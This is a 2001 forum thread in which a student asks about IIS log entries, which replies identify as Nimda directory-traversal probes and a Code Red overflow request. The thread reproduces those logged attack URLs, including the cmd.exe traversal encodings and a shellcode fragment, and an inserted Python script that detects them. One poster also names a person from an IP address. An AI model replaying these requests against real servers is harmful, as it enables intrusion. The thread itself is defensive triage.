whoisurdaddy (Posted November 13, 2001)

Hello, I was just looking through my web server's log file and I found this (this is only part of the whole log file):

206.166.234.62, -, 11/12/2001, 12:48:17, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 72, 3387, 404, 3, GET, /scripts/root.exe, /c+dir,
206.166.234.62, -, 11/12/2001, 12:48:19, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 70, 3387, 404, 3, GET, /MSADC/root.exe, /c+dir,
206.166.234.62, -, 11/12/2001, 12:48:20, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 80, 3387, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
206.166.234.62, -, 11/12/2001, 12:48:22, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 80, 3387, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
206.166.234.62, -, 11/12/2001, 12:48:23, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 96, 3387, 404, 3, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
206.166.234.62, -, 11/12/2001, 12:48:25, W3SVC1, HEADHUNTER, 206.228.118.165, 10, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
206.166.234.62, -, 11/12/2001, 12:48:25, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 117, 3387, 404, 3, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
206.166.234.62, -, 11/12/2001, 12:48:27, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 145, 3387, 404, 3, GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe, /c+dir,
206.166.234.62, -, 11/12/2001, 12:48:29, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 97, 3387, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
206.166.234.62, -, 11/12/2001, 12:48:34, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 97, 3387, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
206.166.234.62, -, 11/12/2001, 12:48:35, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 97, 3387, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
206.166.234.62, -, 11/12/2001, 12:48:41, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 97, 3387, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
206.166.234.62, -, 11/12/2001, 12:48:42, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 98, 3387, 404, 3, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
206.166.234.62, -, 11/12/2001, 12:48:46, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 96, 3387, 404, 3, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
206.166.234.62, -, 11/12/2001, 12:48:48, W3SVC1, HEADHUNTER, 206.228.118.165, 10, 100, 3387, 404, 3, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
206.166.234.62, -, 11/12/2001, 12:48:49, W3SVC1, HEADHUNTER, 206.228.118.165, 10, 96, 3387, 404, 3, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
216.179.62.9, -, 11/12/2001, 16:58:32, W3SVC1, HEADHUNTER, 206.228.118.165, 50, 34, 3387, 404, 3, GET, /scripts/root.exe, -,
211.44.231.41, -, 11/12/2001, 20:26:40, W3SVC1, HEADHUNTER, 206.228.118.165, 1973, 4039, 171, 200, 0, GET, /default.ida, NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a,

I see a bunch of "N" and the part with "/scripts/root.exe, /c+dir..." kinda worries me. I don't know what it does but I don't think it is good. My guess is that it is accessing my root directory of the C drive?? I am using IIS 5.1 that came with WinXP Professional. Can someone explain to me what is going on from the log info above? Sorry if this post is too long.
Palos (Posted November 13, 2001)

What kind of log format are you using for IIS?
- IIS Standard
- IIS Standard with UserID
- IIS Standard with SessionID
- IIS Standard with User&SessionID
Or extended with all the options above....

Actually, on a closer look I think it's the Standard IIS format. The format is the following:

hostname, auth user, date, time, service, server name, virtual host, server response, bytes received, bytes sent, status, window status, method, resource, query string

This corresponds to:

206.166.234.62, -, 11/12/2001, 12:48:17, W3SVC1, HEADHUNTER, 206.228.118.165, 0, 72, 3387, 404, 3, GET, /scripts/root.exe, /c+dir,

W3SVC is the WWW service, so you can say for sure it was sent to the WWW server, not the FTP or other. Before you try to figure out what happened, do some more research on the incoming IP. Also try to run the exploits on your own, see how deep you can get on your own machine. I doubt IIS permits remote execution of shell commands via WWW, lol. Check your permissions as well. No more ideas, maybe someone else is brighter.

----------------------

On second thoughts, by looking at the "method" field, I think it is self-explanatory. The attacker tried to execute cmd.exe by giving a URL, and got the 404 error all the way, except for one case when IIS returned a 500 error; 404 means page not found. I hope that was it, couldn't bet on it though.
Fekalen (Posted November 13, 2001)

If it was an attempted hack this guy ain't too bright. He has his own homepage: 206.228.118.165 = http://t118165.turbonet.com/ And I would guess his name is Kenneth Tun. He lives in Moscow (not the Russian capital), Idaho - USA. Here's a mail address to report his abuse to his ISP if you want: abuse@sprint.net
clutch (Posted November 13, 2001)

Don't worry about it. That's a Nimda infected box attacking, and that's its signature. Are you patched up for it? Here's some links about ways to secure IIS, and a link to getting URLScan from MS. It will generate 404 errors when someone makes a request that breaks the predetermined rule set.

Here is a general checklist:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/prodtechnol/iis/tips/iis5chk.asp

Here is a link for resources on securing IIS:
http://support.microsoft.com/support/kb/articles/q282/0/60.asp

And here is a link for the new Security Tool Kit from MS:
http://support.microsoft.com/support/kb/articles/Q309/5/36.ASP

This is a link for URLScan (my fav) that is briefly mentioned in a couple of the other links:
http://support.microsoft.com/support/kb/articles/q307/6/08.asp

You will also see references to the IISLockdown Tool, which is pretty strict and works by locking various ISAPI filters and fixing permissions on system directories in case someone can traverse directories (which won't happen anyway if you are using URLScan and it's configured properly). The High Security Template is nice too, and protected many IIS boxes from infection.

You can also subscribe to the security release email list at this link to get all the latest info on patches and such:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/notify.asp

I have been getting these for quite a while. Here's a page I wrote that queries my logs (I have IIS set up to log to a SQL DB): www.driventechnologies.com/odbclog and type "cmd.exe" without the quotes into the target box. The date range defaults to the current day, but the logs go back to August 1, 2001.
whoisurdaddy (Posted November 13, 2001)

Thank you all for replying. Fekalen, that is my server. 206.228.118.165 is my comp's IP and I am also running a web server on it just for messing around. I am just wondering because I thought I pretty much secured my computer. I have ZoneAlarm Pro firewall and all guest accounts are disabled and stuff...

----

Palos, I am using Microsoft IIS Log file format. There are only 3 available for me to choose from: Microsoft IIS Log file format, NCSA Common log file and W3C Extended Log file format.

----

Clutch, I don't think mine is patched up for Nimda. I ran Windows Update two days ago and I downloaded a lot of patches from the Microsoft Windows Update site but I don't think that Windows Update patched up my computer for Nimda.
Palos (Posted November 13, 2001)

Muhuhahaha, Fekalen... good job man. Clutch sez that it looks like a Nimda zombie, he could be right. If the remote machine tried to execute a shell prompt, that doesn't mean he necessarily DID it.
clutch (Posted November 13, 2001)

To flush the normal Code Red worm, you could simply reboot and then apply the patch (with the server offline so it wouldn't get infected again). That would take care of the issue. Some Nimda and Code Red II boxes had nice backdoors left open for intrusions later on. On the MS security site, there is a tool for ridding the system of the worm that stays behind, but there could have been other damage.

On your logs, I see many "404" errors, and the lone "500" error (could be for security, invalid execution, etc.) which is a good sign. It shows that your server wasn't able to execute the requests. Now, here is a normal attack cycle from a Nimda box:

24.60.219.128 - 11/13/2001 11:44:44 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%252f../winnt/system32/cmd.exe?/c+dir - Info
24.60.219.128 - 11/13/2001 11:44:42 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir - Info
24.60.219.128 - 11/13/2001 11:44:40 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir - Info
24.60.219.128 - 11/13/2001 11:44:29 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir - Info
24.60.219.128 - 11/13/2001 11:44:27 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir - Info
24.60.219.128 - 11/13/2001 11:44:25 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir - Info
24.60.219.128 - 11/13/2001 11:44:23 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir - Info
24.60.219.128 - 11/13/2001 11:44:20 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir - Info
24.60.219.128 - 11/13/2001 11:44:18 AM W3SVC3 SERVER-1 192.168.1.200 404 - /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir - Info
24.60.219.128 - 11/13/2001 11:44:16 AM W3SVC3 SERVER-1 192.168.1.200 404 - /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - Info
24.60.219.128 - 11/13/2001 11:44:14 AM W3SVC3 SERVER-1 192.168.1.200 404 - /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - Info
24.60.219.128 - 11/13/2001 11:44:12 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%255c../winnt/system32/cmd.exe?/c+dir - Info
24.60.219.128 - 11/13/2001 11:44:10 AM W3SVC3 SERVER-1 192.168.1.200 404 - /d/winnt/system32/cmd.exe?/c+dir - Info
24.60.219.128 - 11/13/2001 11:44:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /c/winnt/system32/cmd.exe?/c+dir - Info
24.60.219.128 - 11/13/2001 11:44:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /MSADC/root.exe?/c+dir - Info
24.60.219.128 - 11/13/2001 11:44:03 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/root.exe?/c+dir -

Look familiar? Here's the break down on yours:

206.166.234.62 was an automated Nimda attack;
216.179.62.9 was a solo direct attack (but a 404 error - "page not found", so no biggie);
211.44.231.41 old Code Red attack (uses "N" for the flood, an "X" is Code Red II).

So, you will probably see a lot of these, and you will see them for some time to come. Just patch up, and move on.
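The triage clutch walks through above, applied to the field order Palos laid out earlier, as an added Python example (not code from anyone in this thread): parse the Microsoft IIS log format, collapse the traversal encodings so every cmd.exe variant compares as the same path, label each hit a Nimda sweep, a Code Red "N" flood or a Code Red II "X" flood, and count how many of those requests the server answered with something other than an error. The sample log lines are constructed with private addresses and patterned after the requests quoted in the two posted logs; the encodings it undoes (%5c, %2f, double-encoded %255c, the %%35c variant, overlong UTF-8 %c0%af / %c0%2f / %c1%1c / %c1%9c) are the ones visible there, and the labels follow clutch's reading of the traffic rather than any vendor signature.

```python
"""Triage Microsoft-IIS-format web logs for Nimda / Code Red probe signatures.
Added example; SAMPLE_LOG is constructed, patterned after the thread's logs."""
import posixpath
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import unquote

# "Microsoft IIS Log File Format": 15 comma-separated fields in this order.
FIELDS = ("client_ip", "user", "date", "time", "service", "server", "server_ip",
          "time_taken_ms", "bytes_recv", "bytes_sent", "status", "win32_status",
          "method", "target", "params")

# Overlong UTF-8 spellings of "/" and "\" used by the Unicode traversal probes.
OVERLONG = {"%c0%af": "/", "%c0%2f": "/", "%c1%9c": "\\", "%c1%1c": "\\"}
FLOOD = re.compile(r"^([NX])\1{15,}")   # long run of N or X opening the query


@dataclass
class Entry:
    client_ip: str
    date: str
    time: str
    status: int
    method: str
    target: str
    params: str


def parse_line(line: str) -> Optional[Entry]:
    """Split one Microsoft-IIS-format record; None if the line is not one."""
    # The logger ends each record with "," and the query string is the last
    # field, so drop the trailing comma and split into at most 15 pieces.
    parts = [p.strip() for p in line.strip().rstrip(",").split(",", len(FIELDS) - 1)]
    if len(parts) != len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    if not rec["status"].isdigit():
        return None
    return Entry(rec["client_ip"], rec["date"], rec["time"], int(rec["status"]),
                 rec["method"], rec["target"], rec["params"])


def normalize(target: str) -> str:
    """Canonicalise a request path the way a URL filter must before matching:
    overlong UTF-8 first, then repeated %xx decoding (%255c -> %5c -> \\),
    then one separator and resolved ../ segments."""
    s = target.lower()
    for enc, sep in OVERLONG.items():
        s = s.replace(enc, sep)
    for _ in range(3):                      # %255c needs two decode passes
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return posixpath.normpath(s.replace("\\", "/"))


def classify(e: Entry) -> Optional[str]:
    """Name the signature an entry belongs to, or None for ordinary traffic."""
    path = normalize(e.target)
    if path.endswith("/winnt/system32/cmd.exe") or path.endswith("/root.exe"):
        # Nimda's sweep: root.exe in /scripts and /MSADC (the Code Red II
        # backdoor), then cmd.exe through a dozen traversal encodings.
        return "nimda_probe"
    if path == "/default.ida":
        m = FLOOD.match(e.params)
        if m:   # per clutch: N flood = Code Red, X flood = Code Red II
            return "code_red" if m.group(1) == "N" else "code_red_ii"
        return "ida_probe"
    return None


def triage(lines: List[str]) -> Dict[str, dict]:
    """Per source IP: signatures seen, attempts, and replies below 400.
    404 = path or mapping absent, 500 = handler refused.  A 2xx only shows
    the mapped handler accepted the request; whether it did anything has
    to be checked on the box, so 'served' is a prompt, not proof."""
    report: Dict[str, dict] = defaultdict(lambda: {"kinds": set(), "attempts": 0, "served": 0})
    for line in lines:
        e = parse_line(line)
        kind = classify(e) if e else None
        if kind is None:
            continue
        r = report[e.client_ip]
        r["kinds"].add(kind)
        r["attempts"] += 1
        if e.status < 400:
            r["served"] += 1
    return dict(report)


SAMPLE_LOG = """\
10.0.0.5, -, 11/12/2001, 12:48:17, W3SVC1, WEB1, 192.168.1.10, 0, 72, 3387, 404, 3, GET, /scripts/root.exe, /c+dir,
10.0.0.5, -, 11/12/2001, 12:48:23, W3SVC1, WEB1, 192.168.1.10, 0, 96, 3387, 404, 3, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
10.0.0.5, -, 11/12/2001, 12:48:25, W3SVC1, WEB1, 192.168.1.10, 10, 117, 0, 500, 87, GET, /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe, /c+dir,
10.0.0.5, -, 11/12/2001, 12:48:27, W3SVC1, WEB1, 192.168.1.10, 0, 97, 3387, 404, 3, GET, /scripts/..%c0%af../winnt/system32/cmd.exe, /c+dir,
10.0.0.9, -, 11/12/2001, 20:26:40, W3SVC1, WEB1, 192.168.1.10, 1973, 4039, 171, 200, 0, GET, /default.ida, NNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801=a,
10.0.0.12, -, 11/12/2001, 21:01:02, W3SVC1, WEB1, 192.168.1.10, 0, 40, 240, 200, 0, GET, /index.htm, -,
"""

if __name__ == "__main__":
    for ip, r in triage(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {sorted(r['kinds'])} attempts={r['attempts']} served={r['served']}")
```

Run as-is it prints one line per probing address; point it at a real Microsoft-IIS-format file by feeding the file's lines to triage(). The point of normalize() is that all the cmd.exe requests in the two logs above, whatever spelling of the backslash they use, collapse to the same /winnt/system32/cmd.exe path, which is the reason a filter such as URLScan has to canonicalise a URL before applying its rule set (not something the thread goes into, but it is why a naive substring match on "..%5c" alone would miss half of the sweep).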
whoisurdaddy (Posted November 13, 2001)

Clutch, thanks for the info. I am still learning about this security stuff. Too bad, in school they don't teach me any stuff like this... maybe next semester they might teach me about network security in one of my MIS classes.
clutch (Posted November 13, 2001)

Unfortunately, I wouldn't count on it. Most MIS grads that I have worked with have learned very little about systems architecture and application in their MIS courses, let alone anything about security. A good deal of the MIS courses I read through seem more focused on floor/personnel management rather than working directly on the information systems themselves. You might want to take some technical courses in security and network architecture as an elective if possible. Where are you going to school?
Palos (Posted November 14, 2001)

MIS courses left me with a bad taste in my mouth during my college years. Bla, bla, bla... uninteresting stuff, if you know what I mean.
whoisurdaddy (Posted November 14, 2001)

I am a Senior from WSU (Washington State University).
Palos (Posted November 14, 2001)

Dude, listen to me... enjoy your last moments in college as if there was no tomorrow. Real life SUCKS (at least nowadays if you're a fresh CS graduate looking for a job).

PS - and your intelligence level is pretty much average, i.e. you're not a genius on 2 legs, having NSA and NASA knocking at your door, begging you to take their job offers

PPS - By CS graduate I mean Computer Science, NOT Counter-Strike
RandyC (Posted November 14, 2001)

I've learnt loads about system architecture during my 3 years so far at Uni, especially in my Networking Principles and Operating Systems modules last year and this year. I guess maybe UK BSc (Hons) Computer Science degrees go into more depth than some of the States' degrees despite being only 3 year courses. I agree working life does suck, so I'm doing another year in Uni to concentrate on my final year project (which I could have done this year) and get a CCNA. Have to get a job as well though, as I have to do all of these on a part time basis.
clutch (Posted November 14, 2001)

That sounds like a normal Computer Science degree, but we were talking about a Management of Information Systems (MIS) degree. Most schools get so hung up on the "Management" portion that the graduates are almost helpless in "the real world". As for graduating and getting out in the world, making large amounts of money for doing something you like has its perks too, just remember that.
RandyC (Posted November 14, 2001)

Ahh, didn't read that bit, probably because I've never come across an MIS course before. Just wondering if anyone here has done a CCNA course and am wondering how realistically useful it is in the job world. I always get a biased view from my lecturers as our CS department is partially funded by Cisco.

Thanks
RandyC
waddy (Posted November 17, 2001)

I'm currently doing CCNA (semester 3) and am in my 2nd year of my Computer Science degree.

Computer Science degree = a load of crap
CCNA = damn handy stuff

Now, why I say a degree is rubbish is you don't learn anything for the real world... it's all out of date... you walk out of there 3 years behind the real world. Where I work part time, people walk in with degrees, thinking they are quite good... usually last a week... it's not their fault, but the real world is quite different from uni....

Basically, if you want to learn computing, do it at home... all you need is the internet, 1/2 dozen puters, a range of operating systems and some books. I learnt more playing around at home in a few months than college taught me in 2 years......

The only reason I'm doing the degree is it == £££ for that lousy piece of paper...... and I can catch up on my sleep during the lectures.

Without good practical skills, the real world doesn't want to know you....
RandyC (Posted November 18, 2001)

Some good points made, especially:

Quote: I'd guess that many educational institutions are not implementing cutting edge fibre optic networks & Cisco tools and WANS of MASSIVE multicampus scale the students design themselves hands on!

I know I certainly don't get anywhere near enough work on optic networks. I learn the theory but that's about it. As for being out of date, well, that's inevitable considering how fast the computer industry develops as a whole. Although, as AlecStaar states, you learn the 'fundamental principles' which provide you with a grounding to learn any newly developed ideas/methods. I treat my degree as a stepping stone; it will help me get to positions otherwise not available to me if I went straight in after leaving college. In several years' time most of the 'new' material taught to me during the degree will be old hat and maybe superseded by something else, but it does tell employers that you are:
1. Prepared to learn new material
2. Able to hold and regurgitate that material
3. Proven to be fairly intelligent
and finally it's useful CV padding.

I could have started to do my CCNA during my second year, but I had already taken the module that starts the CCNA (Semester 1 & 2) the previous year, before my Uni started to do the CCNA course. Oh well, it seems worthwhile and I enjoy my current network modules, so I'll probably go for it next year part time. Wish me luck

RandyC